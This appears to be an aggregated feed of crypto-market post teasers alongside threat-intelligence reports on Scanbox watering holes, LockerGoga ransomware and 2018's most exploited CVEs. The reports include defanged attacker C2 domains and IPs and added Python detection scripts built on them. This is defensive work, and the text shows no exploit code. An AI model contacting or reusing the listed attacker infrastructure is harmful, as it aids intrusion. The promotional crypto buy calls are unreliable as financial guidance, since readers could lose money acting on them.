In late March two sets of research groups released reports detailing their conclusion that a vast majority of cryptocurrency trading volume was fake. Research from TheTie estimated […]

The post If Just 5% of Cryptocurrency Trade Volume is Real, What Does That Mean for Altcoins? appeared first on Hacked: Hacking Finance.

As Global Economy Approaches Crisis Level, Bitcoin Could Be the Answer

Like clockwork, the International Monetary Fund (IMF) has once again slashed its outlook on global economic growth, citing trade tensions, tighter monetary policy and Brexit as the […]

The post As Global Economy Approaches Crisis Level, Bitcoin Could Be the Answer appeared first on Hacked: Hacking Finance.

Why Investors Should Be Paying Attention to Raiden Network

A lot of crypto analysis is centered around competition within the crypto industry, but sometimes there are businesses that have gone out of their way to be […]

The post Why Investors Should Be Paying Attention to Raiden Network appeared first on Hacked: Hacking Finance.

The VIX Tells Us Stocks are Heading for Record Highs; Why Investors Should Be Worried

The U.S. stock market has been nothing short of a roller coaster the past six months. After registering its worst quarterly drop since the Great Recession, the […]

The post The VIX Tells Us Stocks are Heading for Record Highs; Why Investors Should Be Worried appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Downward Correction Presents Buying Opportunity

Despite being late to the crypto rally, Ethereum (ETH) put up hefty gains on Wednesday, as the developer’s cryptocurrency catapulted 18% to reach its highest level since […]

The post Ethereum Price Analysis: Downward Correction Presents Buying Opportunity appeared first on Hacked: Hacking Finance.

Crypto Update: Break-Out Continues but Coins Turn Volatile as Litecoin Approaches $100

The unprecedented rally in the cryptocurrency segment continued today, with the overwhelming majority of the top coins surging higher again, and with the relatively strong digital currencies […]

The post Crypto Update: Break-Out Continues but Coins Turn Volatile as Litecoin Approaches $100 appeared first on Hacked: Hacking Finance.

Paytomat (PTI) Sale Goes Live Tomorrow, Following Two-Minute Token Sell-Out

International cryptocurrency exchange EXMO announced just yesterday that the platform’s first IEO (International Exchange Offering) for Paytomat ‘PTI’ concluded successfully, three days before its expected completion date. […]

The post Paytomat (PTI) Sale Goes Live Tomorrow, Following Two-Minute Token Sell-Out appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA Still Undervalued after Flipping USDT

Cardano surged on Wednesday, as the combination of fundamental news, technical progress and a market-wide ‘fear of missing out’ propelled ADA to five-month highs. Despite the year-long […]

The post Cardano Price Analysis: ADA Still Undervalued after Flipping USDT appeared first on Hacked: Hacking Finance.

McAfee: ‘Apollo Currency is a Crypto Game Changer’ – But is APL Worth Your Money?

John McAfee has doubled-down on his Apollo Currency advocacy, saying that APL coin is set to solve the ‘blockchain bloat’ problem when sharding is implemented on April […]

The post McAfee: ‘Apollo Currency is a Crypto Game Changer’ – But is APL Worth Your Money? appeared first on Hacked: Hacking Finance.

Crypto Price Analysis: Bitcoin Showing Striking Similarities With Bullish Cardano

Bitcoin (BTC/USD) has been trading within a tight range between $3,750 and $4,170 for over a month on Bitfinex. The narrow trading range is confusing market participants, […]

The post Crypto Price Analysis: Bitcoin Showing Striking Similarities With Bullish Cardano appeared first on Hacked: Hacking Finance.

The Bulls are Back: Crypto Markets Approach Yearly Highs after Profit-Taking

Crypto markets climbed toward yearly highs Wednesday, as bitcoin (BTC) and its altcoin peers rebounded sharply from a profit-taking-inspired dip earlier in the week. Crypto Markets Surge […]

The post The Bulls are Back: Crypto Markets Approach Yearly Highs after Profit-Taking appeared first on Hacked: Hacking Finance.

Crypto Update: Ripple’s Failed Break-Down Leads to Rally Attempt

Harsh trading conditions continue to dominate the cryptocurrency segment, with still no clear directional momentum. After several days of bearish drift, the majors turned higher in a […]

The post Crypto Update: Ripple’s Failed Break-Down Leads to Rally Attempt appeared first on Hacked: Hacking Finance.

Top 7 Blockchain Stocks to Boost Your Portfolio

Blockchain stocks are ones that you may not want to miss the boat on adding to your portfolio. They have the potential to turn into substantial investments, […]

The post Top 7 Blockchain Stocks to Boost Your Portfolio appeared first on Hacked: Hacking Finance.

Scanbox Watering Hole Targets Pakistani and Tibetan Government Website Visitors

Insikt Group

Click here to download the complete analysis as a PDF.

This report outlines recent Scanbox campaigns targeting a Pakistani government department and the Central Tibetan Administration in early March 2019. Insikt Group researchers utilized data from the Recorded FutureⓇ Platform, Shodan, Farsight Security DNS, third-party network metadata, and common OSINT techniques.

This report will be of most interest to network defenders seeking to understand the threat posed by cyberespionage actors leveraging strategic web compromises to conduct network reconnaissance, in advance of a more concerted effort to gain access to their network.

Executive Summary

In early March 2019, Recorded Future’s Insikt Group identified two separate Scanbox campaigns using strategic web compromises to target visitors to the website of Pakistan’s Directorate General of Immigration and Passports (DGIP) and a spoof of the official Central Tibetan Administration (CTA) website. It is likely that in both cases, the attackers intended to profile the devices of website visitors in order to conduct follow-on intrusions.

Insikt Group highlights this activity to enable the protection of targeted communities and to raise awareness of the risks posed by in-memory reconnaissance frameworks, such as Scanbox, used widely by Chinese state-sponsored threat actors, which employ features that enable keylogging and the deployment of additional malware on unsuspecting website visitors.

Key Judgments

  • Analysis of the Tibetan Scanbox deployment highlights several associated domains and IPs revealing a wider campaign of targeting against Tibetan interests.
  • Scanbox has been used previously in the targeting of persecuted minority groups, such as the Uighurs and Tibetans in China.


First noted in early 2014, Scanbox has been used in several high-profile intrusions, including the Anthem breach and the Forbes watering hole attacks, and has been widely adopted by China-based threat actors, including Leviathan (APT40, Temp.Periscope), LuckyMouse (TG-3390, Emissary Panda, Bronze Union), APT10 (menuPass, Stone Panda), and APT3 (Pirpi, Gothic Panda).

Scanbox is a reconnaissance framework that enables attackers to track visitors to compromised websites, perform keylogging, and harvest data that could be used to enable follow-on compromises. It has also been reported to have been modified to deliver secondary malware to targeted hosts. Because Scanbox is written in JavaScript and PHP, deploying it does not require any malware to be downloaded onto the host device.

Recorded Future Timeline

Summary of Scanbox use since 2014. (Source: Recorded Future)

Threat Analysis

Pakistan DGIP Scanbox Instance

On March 4, 2019, Insikt Group identified that the online passport application tracking system on Pakistan’s DGIP website ([.]pk) was compromised by attackers who had deployed Scanbox code onto the page. As a result of the strategic web compromise (SWC), also known as a watering hole, website visitors were redirected to an attacker-controlled Scanbox server hosted on Netherlands IP 185.236.76[.]35, enabling the attackers to deploy Scanbox’s wide array of functionality.

Further details about this Scanbox deployment can be found in a recently published blog by Trustwave.


Scanbox-infected webportal for the tracking system on Pakistan’s DGIP.

Central Tibetan Administration Scanbox Instance

Insikt Group researchers were alerted to a new domain registration within the Recorded Future platform that triggered on a typosquatting rule for tibct[.]net. The domain was first registered on March 6, 2019.

Domain Registration Event

New domain registration event noted in the Recorded Future portal and triggering of typosquat risk rule.

When analyzed, the site exhibited content similarities with the legitimate website of the CTA, as shown below:

Spoof Website Comparison

Side-by-side comparison of spoof CTA website tibct[.]net (left), and the legitimate CTA website tibet[.]net (right).

Subsequently, on March 7, 2019, we identified that the tibct[.]net webpage had been modified by the attackers to incorporate malicious JavaScript that redirected visitors to a Scanbox server hosted on oppo[.]ml (load-balanced across Cloudflare IPs 104.18.36[.]192, 104.18.37[.]192, and 2606:4700:30::6812[:]24c0).

Malicious JavaScript

Malicious JavaScript embedded in spoof domain tibct[.]net.

Visitors who likely intended to visit the official CTA website, tibet[.]net, were being duped into navigating to tibct[.]net, possibly via links in spearphishing emails, and were then redirected to the Scanbox C2 domain oppo[.]ml.

Pivoting from the spoofed domain, tibct[.]net, in WHOIS data revealed that the same email address was used by the attackers to register the domains tibct[.]org (registered March 5, 2019) and monlamlt[.]com (registered March 11, 2019), both of which appear to either host resources relating to Tibet or are typosquats of official CTA domains. Analysis of these domains in Farsight Security’s DNSDB reveals further closely associated infrastructure.

Domain | IP Resolution | Comment
tibct[.]net | 139.59.90[.]169 (March 7 – 8, 2019), 103.255.179[.]142 (March 9, 2019) | Domain registered using an address located in Guangdong, China; typosquat of tibet[.]net
tibct[.]org | | Typosquat of CTA site tibet[.]net
monlamlt[.]com | 23.225.161[.]105 | Typosquat of monlamit[.]com, a Tibetan IT resources and support site
mailshield[.]ga | 23.225.161[.]105 | Possible spoof of an AV product
photogram[.]ga | 23.225.161[.]105 | Possible image sharing spoof (e.g., Instagram)
mail.mailshield[.]ga | 23.225.161[.]105 | Possible spoof of an AV product
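The typosquat pairs in the table (tibct[.]net against tibet[.]net, monlamlt[.]com against monlamit[.]com) differ from the legitimate name by a single character. The following is an added example, not Recorded Future’s typosquat risk rule (whose logic the report does not publish): it measures edit distance on the registrable label of each new registration against a list of protected domains, so that a TLD swap such as tibct[.]org is still caught. The protected domains and the candidate registrations are the ones the report names; the distance threshold and the single-label-suffix assumption are mine.

```python
"""Flag newly registered domains that look like typosquats of protected ones.

Added example; this is not Recorded Future's typosquat risk rule, whose
logic is not published on the page. The protected domains (tibet.net,
monlamit.com) and the defanged candidates are the ones the report names;
the edit-distance threshold is an assumption.
"""
from __future__ import annotations

# Legitimate domains the report says were impersonated.
PROTECTED_DOMAINS = ["tibet.net", "monlamit.com"]


def refang(indicator: str) -> str:
    """Convert a defanged indicator such as tibct[.]net into a usable domain."""
    return indicator.replace("[.]", ".").strip().lower()


def registrable_label(domain: str) -> str:
    """Second-level label, e.g. 'tibct' from 'mail.tibct.net'.

    Assumes a single-label public suffix, which holds for every domain in
    the report; a production rule would consult the Public Suffix List.
    """
    parts = domain.split(".")
    return parts[-2] if len(parts) >= 2 else domain


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) via dynamic programming."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(
                previous[j] + 1,               # deletion
                current[j - 1] + 1,            # insertion
                previous[j - 1] + (ca != cb),  # substitution (0 if equal)
            ))
        previous = current
    return previous[-1]


def typosquat_candidates(new_domain: str, max_distance: int = 1) -> list[tuple[str, int]]:
    """Return (protected_domain, distance) pairs the new registration resembles.

    Distance is measured on the registrable label only, so a TLD swap such
    as tibct.org vs tibet.net is still caught. Distance 0 is the legitimate
    domain itself and is not reported.
    """
    label = registrable_label(refang(new_domain))
    hits = []
    for legit in PROTECTED_DOMAINS:
        distance = levenshtein(label, registrable_label(legit))
        if 0 < distance <= max_distance:
            hits.append((legit, distance))
    return sorted(hits, key=lambda hit: hit[1])


def triage_registrations(new_domains: list[str]) -> dict[str, list[tuple[str, int]]]:
    """Map each flagged registration (refanged) to the domains it resembles."""
    flagged = {}
    for raw in new_domains:
        hits = typosquat_candidates(raw)
        if hits:
            flagged[refang(raw)] = hits
    return flagged


if __name__ == "__main__":
    # Registrations named in the report, written defanged as the report prints them.
    observed = ["tibct[.]net", "tibct[.]org", "monlamlt[.]com",
                "mailshield[.]ga", "photogram[.]ga", "tibet[.]net"]
    for domain, hits in triage_registrations(observed).items():
        print(f"{domain}: resembles {hits}")
```

Only the two registrations that impersonate a protected name are flagged; mailshield[.]ga and photogram[.]ga spoof other brands and need a different rule (brand keywords rather than edit distance), which is why the report lists them separately as "possible spoofs".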


These Scanbox intrusions, which were detected by Insikt Group within a few days of each other, show that the tool is still popular with attackers and is being used against organizations that are broadly aligned with the geopolitical interests of the Chinese state. Based on the identity of the two targeted organizations, as well as the well documented historic use of Scanbox by a variety of Chinese APTs, we assess with low confidence that these Scanbox deployments were likely conducted by Chinese state-sponsored threat actors.

Network Defense Recommendations

Recorded Future recommends organizations implement the following measures when defending against Scanbox targeting as documented in this research:

  • Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
  • Implement the provided Snort rules in the threat hunting package attached in Appendix B into your IDS and IPS appliance and investigate any alerts generated for activity resembling the TTPs outlined in this report.
  • Conduct regular YARA scans across your enterprise for the Scanbox rules listed in the threat hunting package in Appendix B.
  • Recorded Future customers can be alerted to new samples matching the YARA rule currently deployed by Insikt Group researchers within the Recorded Future platform.

To view a full list of the associated indicators of compromise, download the appendix.
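The first recommendation above, alerting on the listed IP addresses and domains, is the one most teams can act on immediately from proxy or DNS logs. The following is an added example, not Recorded Future’s Appendix A or its Snort/YARA package: it refangs the indicators printed in this report, splits them into IPs and domains, and matches constructed proxy log lines against them, including subdomains of a listed domain (mail.mailshield[.]ga) and IPv6 in canonical form. The log format and the sample lines are assumptions.

```python
"""Match proxy log lines against the Scanbox indicators named in the report.

Added example, not Recorded Future's Appendix A list or its Snort/YARA
rules. The indicators are the ones printed in the report (defanged);
the log format and the sample lines are constructed for illustration.
"""
from __future__ import annotations

import ipaddress
import re

# Defanged indicators exactly as the report prints them.
DEFANGED_IOCS = [
    "185.236.76[.]35",            # Scanbox server behind the DGIP compromise
    "oppo[.]ml",                  # Scanbox C2 behind the spoofed CTA site
    "104.18.36[.]192", "104.18.37[.]192", "2606:4700:30::6812[:]24c0",
    "tibct[.]net", "tibct[.]org", "monlamlt[.]com",
    "139.59.90[.]169", "103.255.179[.]142", "23.225.161[.]105",
    "mailshield[.]ga", "photogram[.]ga",
]

# Constructed proxy log lines (format is an assumption): one client that
# visited the real CTA site, then the spoof, then the C2; one unrelated client.
# 203.0.113.10 and 198.51.100.7 are documentation-range placeholders.
SAMPLE_LOG = [
    "2019-03-07T10:15:22Z client=10.0.4.17 host=tibet.net dst=203.0.113.10",
    "2019-03-07T10:16:03Z client=10.0.4.17 host=tibct.net dst=139.59.90.169",
    "2019-03-07T10:16:05Z client=10.0.4.17 host=oppo.ml dst=104.18.36.192",
    "2019-03-08T08:01:40Z client=10.0.9.2 host=mail.mailshield.ga dst=23.225.161.105",
    "2019-03-08T08:02:11Z client=10.0.9.2 host=example.org dst=198.51.100.7",
]

LOG_RE = re.compile(r"client=(?P<client>\S+)\s+host=(?P<host>\S+)\s+dst=(?P<dst>\S+)")


def refang(ioc: str) -> str:
    """Turn 185.236.76[.]35 / 2606:4700:30::6812[:]24c0 back into real values."""
    return ioc.replace("[.]", ".").replace("[:]", ":").strip().lower()


def load_iocs(defanged: list[str]) -> tuple[set[str], set[str]]:
    """Split indicators into canonical IP addresses and domain names."""
    ips, domains = set(), set()
    for raw in defanged:
        value = refang(raw)
        try:
            ips.add(ipaddress.ip_address(value).compressed)  # canonical v4/v6 form
        except ValueError:
            domains.add(value)
    return ips, domains


def domain_matches(host: str, domains: set[str]) -> bool:
    """True when host is an indicator or a subdomain of one (mail.mailshield.ga)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_log(lines: list[str], ips: set[str], domains: set[str]) -> list[tuple[str, list[str]]]:
    """Return (client, reasons) for every line that touches an indicator."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue  # malformed line; a real pipeline would count these
        reasons = []
        if domain_matches(match["host"], domains):
            reasons.append("domain:" + match["host"].lower())
        try:
            dst = ipaddress.ip_address(match["dst"]).compressed
        except ValueError:
            dst = ""
        if dst in ips:
            reasons.append("ip:" + dst)
        if reasons:
            hits.append((match["client"], reasons))
    return hits


def clients_to_triage(hits: list[tuple[str, list[str]]]) -> list[str]:
    """Distinct internal clients that contacted Scanbox infrastructure."""
    return sorted({client for client, _ in hits})


if __name__ == "__main__":
    ip_set, domain_set = load_iocs(DEFANGED_IOCS)
    found = scan_log(SAMPLE_LOG, ip_set, domain_set)
    for client, reasons in found:
        print(client, reasons)
    print("triage:", clients_to_triage(found))
```

Matching both the requested host name and the destination IP is deliberate: the Cloudflare addresses in front of oppo[.]ml are shared with unrelated sites, so an IP-only hit there is weaker evidence than a domain hit, and a reviewer should weigh the two reasons differently when triaging a client.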

The post Scanbox Watering Hole Targets Pakistani and Tibetan Government Website Visitors appeared first on Recorded Future.


Optimize Your Cryptocurrency Portfolio: 7 Altcoin Types You Must Own Before The Surge

Although a rising tide lifts all boats, it may be prudent to consider what type of altcoins you choose for your cryptocurrency portfolio before the next major […]

The post Optimize Your Cryptocurrency Portfolio: 7 Altcoin Types You Must Own Before The Surge appeared first on Hacked: Hacking Finance.

Bitcoin Price Analysis: BTC/USD Quietly Heading for Its Second Consecutive Monthly Gain

Since clawing back above $4,000 last week, bitcoin’s price has entered a stable trading pattern ahead of a key psychological resistance. Despite the lack of momentum observed […]

The post Bitcoin Price Analysis: BTC/USD Quietly Heading for Its Second Consecutive Monthly Gain appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Rebound as Bearish Momentum Fades

The major cryptocurrencies are showing signs of stability today, despite yesterday’s broad-based sell-off, and although the top coins are only sporting modest gains, a sharp downswing has […]

The post Crypto Update: Coins Rebound as Bearish Momentum Fades appeared first on Hacked: Hacking Finance.

Crypto Price Analysis: 5 Altcoins That Show Bullish Continuation

Over the last few months, a good number of altcoins on Binance have managed to post serious gains. These coins popped with a vengeance after being clobbered […]

The post Crypto Price Analysis: 5 Altcoins That Show Bullish Continuation appeared first on Hacked: Hacking Finance.

Binance Coin: BNB Presents Another Opportunity for Interested Buyers

Binance Coin has recently cooled by some 13%, back to a critical near-term area of support, ahead of further leaps north. BNB/USDT presents an opportunity for buying […]

The post Binance Coin: BNB Presents Another Opportunity for Interested Buyers appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: There is Still Opportunity to Grab Some LTC Before it Shoots Back to $100 and Beyond

Litecoin (LTC) price has a minor technical pullback ahead of further potential leaps into the sky. There appear to be just three significant price barriers that are […]

The post Litecoin Price Analysis: There is Still Opportunity to Grab Some LTC Before it Shoots Back to $100 and Beyond appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Trading Around the Bargain Buying Zone

Ripple’s XRP bulls are sleeping within consolidation mode, as price action immensely narrows, ahead of the next fully committed direction. XRP/USD is trading just above a big […]

The post XRP Price Analysis: XRP/USD Trading Around the Bargain Buying Zone appeared first on Hacked: Hacking Finance.

Student Becomes Master as Ontology Overtakes NEO; ONT Price Keeps Climbing

Ontology (ONT) just overtook its former parent chain, NEO (NEO) for the first time ever. Ontology was one of the first tokens to launch on the NEO […]

The post Student Becomes Master as Ontology Overtakes NEO; ONT Price Keeps Climbing appeared first on Hacked: Hacking Finance.

LockerGoga Ransomware Disrupts Operations at Norwegian Aluminum Company

Norwegian aluminum company Norsk Hydro was hit by a ransomware attack on Tuesday, March 19, 2019. According to the Norwegian National Security Authority (NSM), the attackers used LockerGoga, a relatively new strain of ransomware first discovered in January.

According to Reuters, the attack was severe enough to disrupt parts of production at Norsk Hydro. On Tuesday morning, employees were prevented from logging into the network for fear of spreading the ransomware, while the IT staff was attempting cleanup.

Findings from Recorded Future’s Insikt Group indicate that the first known outbreak of LockerGoga was in late January of this year, when it was used against Altran, a French engineering consultancy. During this first campaign, the LockerGoga malicious binary was digitally signed by a previously unknown code signing authority, MIKL LIMITED. The trust for this certificate was revoked following the Altran attack. The new samples relating to the Norsk Hydro attack appear to be signed by ALISA LTD — again, a relatively unknown entity. Trust for this certificate has also now been revoked.

LockerGoga Ransomware Timeline

LockerGoga activity between January 2019 to March 2019.

The LockerGoga ransomware itself is not very sophisticated, according to analysis published by Bleeping Computer. Deployment of the ransomware is manual, with the attackers behind LockerGoga most likely using Active Directory to spread it. Initial infection at Norsk Hydro is suspected to have been via a phishing campaign, but that has not been confirmed as of this writing. At this time, there is no decryption tool for LockerGoga. The cure for LockerGoga at this point appears to be good protection against phishing attacks and keeping antivirus and other endpoint protections up to date.

Once inside a target network, the team behind LockerGoga is using techniques similar to the attackers behind Ryuk, CrySIS, SamSam, and other recent successful ransomware campaigns: deploying the ransomware in multiple places on the target network to disrupt operations, cause the most damage, and force the targeted organization to pay the ransom — although the skillset of the LockerGoga team seems to be more shallow than similar teams.

However, the team at Norsk Hydro has stated they will not pay the ransom; instead, they are restoring systems from backup.

These types of disruptive attacks are becoming more common, with the most famous one being the SamSam attack on Atlanta last year. Recent attacks on the Boston Public Defender’s Office, Orange County in North Carolina, and shipping company COSCO have all had a disruptive effect on services.

There are a million reasons not to pay the ransom in these types of attacks. Paying the ransom only helps the criminals to produce better malware, and like a bad romance, it may encourage them (or other attackers) to strike a target again, knowing that they are likely to pay the ransom. This happened with the Colorado Department of Transportation in 2018.

The costs to restore dozens or hundreds of systems are enormous, however, and that doesn’t take into account all of the associated incident response costs. From a cost perspective, it may make more sense to pay the ransom. One word of caution with regard to LockerGoga: this particular ransomware also encrypts DLL files. There have been cases with other ransomware families where trying to decrypt systems that contain encrypted DLL files fails. This means organizations have paid the ransom and still didn’t have access to their files.

Click here to download the associated indicators of compromise.

Click here to download the associated Yara rules.

The post LockerGoga Ransomware Disrupts Operations at Norwegian Aluminum Company appeared first on Recorded Future.


Crypto Price Analysis: NEM and Ethereum Classic Ripe for Bottom Picking

Legendary investor Baron Rothschild once said, “the time to buy is when there’s blood in the streets.” While this quote may not make sense to new traders, […]

The post Crypto Price Analysis: NEM and Ethereum Classic Ripe for Bottom Picking appeared first on Hacked: Hacking Finance.

Bitcoin Cash Price Analysis: U.S. Electronics Giant Avnet to Accept BCH; Price Action has Cooled but Subject to Further Buying Pressure

Nasdaq-listed electronics giant Avnet is set to start accepting Bitcoin Cash and Bitcoin as a method of payment. BCH/USD price is consolidating after a decent push […]

The post Bitcoin Cash Price Analysis: U.S. Electronics Giant Avnet to Accept BCH; Price Action has Cooled but Subject to Further Buying Pressure appeared first on Hacked: Hacking Finance.

Cardano’s Run North Continues as CoinMarketCap Gives ADA an ‘A’ Grade

After a brief pause, Cardano (ADA) continued higher Wednesday following a successful mainnet upgrade and positive speculation linking the cryptocurrency to a potential Coinbase listing. A solid […]

The post Cardano’s Run North Continues as CoinMarketCap Gives ADA an ‘A’ Grade appeared first on Hacked: Hacking Finance.

Rise of the Small-Caps: Tezos, Zcash, VeChain Surge as Majors Stagnate

As the top cryptocurrencies stagnated Wednesday, a group of prominent small caps put up big gains through the morning session, once again highlighting the ‘decoupling effect’ between […]

The post Rise of the Small-Caps: Tezos, Zcash, VeChain Surge as Majors Stagnate appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Core Developers Eye ASIC-Resistant Algorithm ProgPoW Integration

The Ethereum core developer team discussed in their most recent meeting the integration of an ASIC-resistant algorithm, ProgPoW. ETH/USD price action is within consolidation mode; a formation […]

The post Ethereum Price Analysis: Core Developers Eye ASIC-Resistant Algorithm ProgPoW Integration appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: Faster and More Energy Efficient ZEC Miner Released by Bitmain

The mining giant, Bitmain, launched a newly upgraded miner for Zcash (ZEC). It is said to be three times more efficient. ZEC/USD bulls are enjoying a rally […]

The post Zcash Price Analysis: Faster and More Energy Efficient ZEC Miner Released by Bitmain appeared first on Hacked: Hacking Finance.

Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018

Click here to download the complete analysis as a PDF.

This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report, and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.

Executive Summary

Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to shed light on this by determining the top 10 vulnerabilities from 2018. It is imperative that security professionals have insight into those vulnerabilities that impact a company’s technology stack and are included in exploit kits, used to distribute a remote access trojan (RAT), or are currently being used in phishing attacks.

In 2018, we observed more exploits targeting Microsoft products than Adobe ones. Eight out of 10 vulnerabilities exploited via phishing attacks, exploit kits, or RATs targeted Microsoft products, and only one Adobe Flash vulnerability made the top 10, likely due to a combination of better patching and Flash Player’s impending demise in 2020.

As in past years, the development of new exploit kits has continued to drop amid the shift to more targeted attacks and less availability of zero-day vulnerabilities. Exploit kits in previous years took advantage of Adobe product vulnerabilities, which have continued to dwindle.

Key Judgments

  • For the second year in a row, Microsoft was consistently targeted the most, with eight of the top 10 vulnerabilities impacting its products. In 2017, seven of the top 10 vulnerabilities also affected Microsoft. Conversely, the majority of 2016 and 2015’s top vulnerabilities targeted Adobe Flash Player.
  • As in 2017’s report, only a few vulnerabilities from past reports remained in the top exploited vulnerabilities. CVE-2017-0199, last year’s top exploited vulnerability, which impacted Microsoft Office, moved to fifth place, with its continued inclusion in the ThreadKit exploit kit. CVE-2016-0189, the top vulnerability in 2016 and ranked second in 2017, was still associated with five different exploit kits. Per a 2017 RAND report, vulnerabilities have an average life expectancy of nearly seven years.
  • The number of new exploit kits dropped by 50 percent in 2018, with only five new exploit kits compared to 10 the year before. Two of these exploit kits were associated with 2018’s top exploited vulnerabilities: Fallout and LCG Kit. The same factors as in previous years continue to drive the decline of exploit kits, including the shift to more secure browsers and more specific victim targeting.
  • With this year’s inclusion of RATs, 35 new RATs were released in 2018, versus 47 in 2017. Only one of these new RATs, Sisfader, was associated with a top vulnerability: CVE-2017-8750, a Microsoft Office exploit.
  • One exploit kit, ThreadKit, stood out for its number of references on the dark web compared to other exploit kits. As of December 31, 2018, ThreadKit contained four of the top 10 vulnerabilities and was last selling on the dark web for $400.

Cyber Vulnerability | References | Company
CVE-2018-8174 | 567 | Microsoft
CVE-2018-4878 | 387 | Adobe
CVE-2017-11882 | 223 | Microsoft
CVE-2017-8750 | 192 | Microsoft
CVE-2017-0199 | 91 | Microsoft
CVE-2016-0189 | 78 | Microsoft
CVE-2017-8570 | 68 | Microsoft
CVE-2018-8373 | 66 | Microsoft
CVE-2012-0158 | 55 | Microsoft
CVE-2015-1805 | 49 | Google Android


Recorded Future continued to expand the breadth of its annual list of top 10 vulnerabilities by adding RATs, in addition to co-occurrence with exploit kits or phishing attacks, which were added in 2017. As in other years, the goal of this list is to highlight the vulnerabilities most exploited by the criminal underground. While the leak of nation state-related exploits made headlines in 2018, Recorded Future did not see evidence that these exploits were widely used by the criminal underground, so they are not a focus of this analysis.

The list continued to analyze occurrences of vulnerabilities with exploit kits, as done in the past three years’ reports. Since the emergence of exploit kits in 2006, cybercriminals have needed less coding experience to take advantage of this straightforward crimeware-as-a-service channel.

The inclusion of RATs provides an additional malware category to determine which vulnerabilities were the most frequent in 2018. RATs have been a mainstay for cybercriminals, as they can provide the attacker with complete control over a victim’s computer.

Methodology and Sources

Recorded Future utilized a list of 167 exploit kits as one of the parameters to determine the top referenced and exploited vulnerabilities of 2018. Only five new exploit kits were created in 2018, compared to 10 in 2017.

[Figure: Exploit kit category in Recorded Future containing dozens of exploits.]

This year’s report also included RATs when determining the top exploited vulnerabilities. Recorded Future used its repository of 492 RATs. RATs were added in part because of the increase in their usage, driven by their role as multipurpose malware.

[Figure: RAT malware category in Recorded Future.]

A few vulnerabilities were not included in the top 10 due to adoption by nation-state actors as opposed to use by the criminal underground: ETERNALBLUE and Spectre/Meltdown. The ETERNALBLUE exploit (which used MS17-010), while often mentioned, was not used by the criminal underground or offered for sale as part of other exploit kits. Spectre, while noted in a few phishing attacks, was also not heavily used by cybercriminals. One possible reason is that these exploits are more sophisticated and difficult to use than typical exploit kits, which were once prolific due to their ease of use. However, as shown by Recorded Future’s previous research on top vulnerabilities, the emergence of new exploit kits continues to decrease.

As this annual list is based on metadata analysis of available information from open, deep, and dark web sources, Recorded Future did not reverse-engineer any malware mentioned in this piece. Instead, the aim of this report is to showcase the most exploited vulnerabilities.

Last Year’s Top Exploited Vulnerabilities

The top exploited vulnerability on the list, CVE-2018-8174, a Microsoft Internet Explorer vulnerability nicknamed “Double Kill,” was included in four exploit kits (RIG, Fallout, KaiXin, and Magnitude). Exploit kits associated with this vulnerability were noted to spread the malware Trickbot through phishing attacks. The Magnitude exploit kit delivered Magniber ransomware, which primarily targeted users in Asia where computer default languages were in Korean, Chinese, or Malay.

CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year’s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016’s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below.

[Figure: Last price update for the Fallout exploit kit by FalloutEK.]

For the first time, a vulnerability has made the top 10 vulnerability list three years in a row — CVE-2016-0189. Why has this vulnerability persisted? For starters, CVE-2016-0189 is not dependent on one version of Internet Explorer (it impacts IE 9 through 11), making it a more reliable vulnerability to exploit. Because of this versatility, the vulnerability has been successfully incorporated into a variety of exploit kits over the years, as many as five in 2018 (Underminer, Magnitude, Grandsoft, KaiXin, and RIG). Additionally, there are no mitigating factors available to prevent CVE-2016-0189 — the only workarounds are restricting access to two common dynamic-link library files: VBScript.dll and JScript.dll.

Two vulnerabilities were associated with numerous pieces of malware: CVE-2017-11882 and CVE-2017-0199. These vulnerabilities were associated with 10 and eight pieces of malware, respectively. Both were used in Trillium’s Security Multisploit Tool, which included four of the top 10 vulnerabilities. This tool was heavily discussed and advertised on Hack Forums and Nulled Forum, and received positive reviews. CVE-2017-0199 was notably used by Gorgon Group, a threat group operating out of Pakistan that targeted government organizations in the U.K. and United States, among others, through targeted spearphishing attacks.

[Figure: Post on Trillium’s Security Multisploit Tool as seen on numerous dark web forums.]

| Cyber Vulnerability | Malware Count |
| --- | --- |
| CVE-2018-8174 | 7 |
| CVE-2018-4878 | 4 |
| CVE-2017-11882 | 10 |
| CVE-2017-8750 | 4 |
| CVE-2017-0199 | 8 |
| CVE-2016-0189 | 5 |
| CVE-2017-8570 | 4 |
| CVE-2018-8373 | 1 |
| CVE-2012-0158 | 1 |
| CVE-2015-1805 | 1 |
| Cyber Vulnerability | Company | Product | Associated Malware | CVSS | Recorded Future Risk Score |
| --- | --- | --- | --- | --- | --- |
| CVE-2018-8174 | Microsoft | Internet Explorer | Fallout Exploit Kit, KaiXin Exploit Kit, LCG Kit Exploit Kit, Magnitude Exploit Kit, RIG Exploit Kit, Trickbot, Underminer Exploit Kit | 7.6 | 89 |
